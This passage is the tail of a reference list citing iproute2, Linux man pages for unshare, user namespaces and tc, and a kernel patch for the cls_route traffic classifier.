  8. iproute2, "This is a set of utilities for Linux networking." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/iproute2/iproute2
  9. "unshare(2) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man2/unshare.2.html
  10. "user_namespaces(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/user_namespaces.7.html
  11. "tc(8) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man8/tc.8.html
  12. "[PATCH] net_sched: cls_route: remove from list when handle is 0." lore.kernel.org, Accessed: May. 31, 2026. [Online]. Available: https://lore.kernel.org/netdev/20220809170518.164662-1-cascardo@canonical.com/T/#u
last updated: